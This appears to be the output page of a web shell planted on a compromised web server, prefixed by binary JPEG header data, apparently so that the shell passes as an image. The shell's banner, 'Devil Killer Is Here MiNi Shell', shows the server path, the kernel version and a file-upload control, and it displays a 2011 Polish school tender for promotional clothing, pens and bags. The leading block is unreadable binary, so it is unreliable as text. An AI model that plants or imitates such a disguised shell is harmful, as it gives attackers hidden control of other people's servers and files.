JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111213/424590-N-2011.html

<p class="kh_header"><b>Białobrzegi: Dostawa gadżetów promocyjnych w ramach realizacji przez Zespół Szkół Ponadgimnazjalnych w Białobrzegach projektów Dobra Szkoła - Blisko Domu oraz Innowacja Edukacyjna Zdrowie Sport Uroda współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 424590 - 2011; data zamieszczenia: 13.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych w Białobrzegach , ul. Żeromskiego 86, 26-800 Białobrzegi, woj. mazowieckie, tel. 048 613 27 10, faks 048 613 45 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspbialobrzegi.edu.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gadżetów promocyjnych w ramach realizacji przez Zespół Szkół Ponadgimnazjalnych w Białobrzegach projektów Dobra Szkoła - Blisko Domu oraz Innowacja Edukacyjna Zdrowie Sport Uroda współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1 Projekt Innowacja Edukacyjna - Zdrowie Sport Uroda 400 kompletów w tym:
i) 1 komplet gadżetów promocyjnych zawierający 16 sztuk spodni dresowych (Spodnie  100% poliester, minimum 230g, kolor czarny. Ściągacz z gumką i troczki w pasie. Dwie kieszenie po bokach + kieszeń tylna zamykana. Elementy odblaskowe po bokach. Różne rozmiary), 9 sztuk bluz dresowych damskich (Kolor czarny, materiał 100% poliester min 230g/m2. Kieszenie na suwak. Kołnierz typu stójka ze ściągaczem. Na dole ściągacz. Rękawy zakończone ściągaczem. Elementy odblaskowe po obu stronach bluzy. Nadruk na lewej piersi pełno kolorowe logo szkoły + na lewym rękawie logotypy unijne i hasło programu. Różne rozmiary), 9 sztuk szortów damskich (Spodenki 100% poliester w kolorze pomarańczowym z szarymi wstawkami, ściągacz + troczek w pasie. Nadruk dwucyfrowy numer na nogawce z czarnej gumki. Różne rozmiary), 9 sztuk koszul damskich (Koszulka w kolorze szarym z pomarańczowymi wstawkami. 100% poliester ok. 140g/m2 Tkanina oddychająca, lekka i szybko schnąca. Nadruk: z przodu logo szkoły pełno kolorowe + 2 cyfrowy numer wprasowany z gumy, na rękawie nazwa programu + logotypy unijne, plecy duży nadruk nazwa szkoły, duży numer dwucyfrowy+ pod numerem napis Białobrzegi przez całą szerokość koszulki, nadruk z pomarańczowej gumki), 9 sztuk koszul damskich (Koszulka w kolorze pomarańczowym z szarymi lub białymi wstawkami. 100% poliester ok. 140g/m2 Tkanina oddychająca, lekka i szybko schnąca. Nadruk: z przodu logo szkoły pełno kolorowe + 2 cyfrowy numer wprasowany z gumy, na rękawie nazwa programu + logotypy unijne, plecy duży nadruk nazwa szkoły, duży numer dwucyfrowy+ pod numerem napis Białobrzegi przez całą szerokość koszulki, nadruk z czarnej gumki. różne rozmiary), 7 sztuk bluz dresowych męskich (kolor czarny, materiał 100% poliester min 230g/m2. Kieszenie na suwak. Kołnierz typu stójka ze ściągaczem. Na dole ściągacz. Rękawy zakończone ściągaczem. Elementy odblaskowe po obu stronach bluzy. Nadruk na lewej piersi pełno kolorowe logo szkoły + na lewym rękawie logotypy unijne i hasło programu. Różne rozmiary), 7 sztuk koszul męskich (Koszulka w kolorze szarym z pomarańczowymi wstawkami. 100% poliester ok. 140g/m2 Tkanina oddychająca, lekka i szybko schnąca. Nadruk: z przodu logo szkoły pełno kolorowe + 2 cyfrowy numer wprasowany z gumy, na rękawie nazwa programu + logotypy unijne, plecy duży nadruk nazwa szkoły, duży numer dwucyfrowy+ pod numerem napis Białobrzegi przez całą szerokość koszulki, nadruk z pomarańczowej gumki. Różne rozmiary), 7 sztuk szortów męskich (Spodenki 100% poliester w kolorze czarnym, ściągacz + troczek w pasie. Nadruk dwucyfrowy numer na nogawce z białej gumki. Różne rozmiary) oraz 16 sztuk getrów (100% poliamidu na łydce oraz 100% bawełna na stopie, kolor czarny i pomarańczowy. Różne rozmiary).
ii) 399 kompletów gadżetów promocyjnych zawierających 399 sztuk słoników pluszowych (Mały słonik pluszowy w koszulce nadruk logo szkoły + logotypy unijne, nadruk wielokolorowy ), 399 sztuk etui na telefon komórkowy (Etui wykonane z lekkiej pianki, zamykane na rzep. Z taśmą umożliwiająca noszenie na szyi Nadruk logo szkoły + logo unijne i nazwa programu), 399 sztuk notesów z długopisem - całość w etui (Notes zawiera długopis, całość w etui. Materiał: Plastic 100% ABS. Waga minimum 65 gram, Wymiary minimum długość 75mm, wysokość 10mm, szerokość 100mm. Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 30 x 50mm), 399 sztuk długopisów niebieskich (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent blue), 399 sztuk długopisów pomarańczowych (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent orange) oraz 399 sztuk długopisów białych transparentnych (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent white)
CZEŚĆ 2 Projekt Innowacja Edukacyjna - Zdrowie Sport Uroda 400 kompletów w tym:
i) 40 kompletów gadżetów promocyjnych zawierających 40 sztuk plecaków miejskich (plecak miejski z regulowanym paskiem na ramię, kieszonka na media z wyjściem na słuchawki, kieszeń wewnętrzna na akcesoria, boczna kieszeń na butelkę do napojów. Wykonany z poliestru 600D. Kolor czarny lub/i niebieski. Wymiary minimum długość 300mm, wysokość: 175mm, szerokość: 450. Nadruk logo szkoły + logotypy unijne), 40 sztuk toreb podróżnych (Torba podróżna z regulowanymi paskami, duże kieszenie boczne. Wykonana z poliestru 600D. Kolor żółty. Wymiary minimalnie wysokość 340mm, szerokość 260mm, długość 670mm, Nadruk logo szkoły + logotypy unijne, wymiary nadruku minimum: 10 x 15), 40 sztuk kalkulatorów (Kalkulator z kalendarzem i zegarem z nadrukiem nazwy szkoły i logami unijnymi i nazwą programu), 40 sztuk długopisów niebieskich (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent blue), 40 sztuk długopisów pomarańczowych (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent orange), 40 sztuk długopisów białych transparentnych (Długopis wykonany z plastiku 100% ABS. Waga minimum 12 gram, długość minimum 13mm, Nadruk logo szkoły + logo unijne i nazwa programu wymiary nadruku: 40 x 7mm, kolor transparent white) oraz 40 sztuk kubków termicznych (kubek termiczny. Plastik wewnątrz. Kolor srebrny, wymiary minimum 190mm na 135mm Nadruk logo szkoły + logo unijne i nazwa programu)
ii) 70 plecaków miejskich (plecak miejski z regulowanym paskiem na ramię, kieszonka na media z wyjściem na słuchawki, kieszeń wewnętrzna na akcesoria, boczna kieszeń na butelkę do napojów. Wykonany z poliestru 600D. Kolor czarny lub/i niebieski. Wymiary minimum długość 300mm, wysokość: 175mm, szerokość: 450. Nadruk logo szkoły + logotypy unijne)
iii) 90 kalkulatorów (Kalkulator z kalendarzem i zegarem z nadrukiem nazwy szkoły i logami unijnymi i nazwą programu)
iv) 160 kubków termicznych (kubek termiczny. Plastik wewnątrz. Kolor srebrny, wymiary minimum 190mm na 135mm Nadruk logo szkoły + logo unijne i nazwa programu)
v) 25 zestawów piśmienniczych (długopis i pióro kulkowe wykończone włóknem węglowym w etui z imitacji skóry, całość w eleganckim drewnianym opakowaniu z imitacji skóry w kolorze czarnym, materiał: metal, Nadruk logo szkoły + logo unijne i nazwa programu, wymiary nadruku minimum: 30 x 30 mm).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia o spełnianiu warunków udziału w postępowaniu oraz o spełnianiu warunków zawartych w art. 22 ust. 1 pkt 1 - 4 Pzp. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór
Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły 1/0 (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie przez Wykonawcę, iż gwarantuje w okresie gwarancji i rękojmi (który nie może być krótszy niż 24 miesiące) usunięcie na własny koszt i we własnym zakresie zgłoszonych przez Zamawiającego wady i usterki. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór. Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia o spełnianiu warunków serwisu technicznego według formuły 1/0 (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku w oparciu o treść oświadczenia Wykonawcy iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych. Do sporządzenia oświadczenia można wykorzystać załączony do SIWZ wzór. Spełnienie ww. warunku oceniane będzie w oparciu o treść oświadczenia według formuły 1/0 (spełnia/nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- WZÓR KAŻDEGO z oferowanych rodzajów gadżetów promocyjnych w postaci identycznej z gadżetem który oferent zamierza dostarczyć po podpisaniu umowy (tj. jest spodni dresowych, bluz dresowych damskich, szortów damskich, koszul damskich (w kolorze szarym z pomarańczowymi wstawkami) koszul damskich (w kolorze pomarańczowym z szarymi lub białymi wstawkami), bluz dresowych męskich, koszul męskich, szortów męskich getrów, słoników pluszowych, etui na telefon komórkowy, notesów z długopisem - całość w etui, długopisów niebieskich, długopisów pomarańczowych, długopisów białych transparentnych, plecaków miejskich, toreb podróżnych, kalkulatorów, kubków termicznych)
- gabaryty, 
- wagę, 
- materiały z których został wykonany,
- specyficzne warunki użytkowania (jeśli dotyczy)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Parafowany przez upełnomocnionego przedstawiciela Wykonawcy projekt umowy- załącznik nr 6 
2)	oferta na wykonanie zamówienia publicznego (Zał. nr 1 do SIWZ)
3)	dokumentów potwierdzających uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub
innych dokumentów rejestrowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ocena jakościowa - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspbialobrzegi.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych w Białobrzegach
Ul. Żeromskiego 86
26-800 Białobrzegi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 08:15, miejsce: Zespół Szkół Ponadgimnazjalnych w Białobrzegach
Ul. Żeromskiego 86
26-800 Białobrzegi.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektów współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki
Priorytet IX Rozwój wykształcenia i kompetencji w regionach
Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego
1/POKL/9.2/2009.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com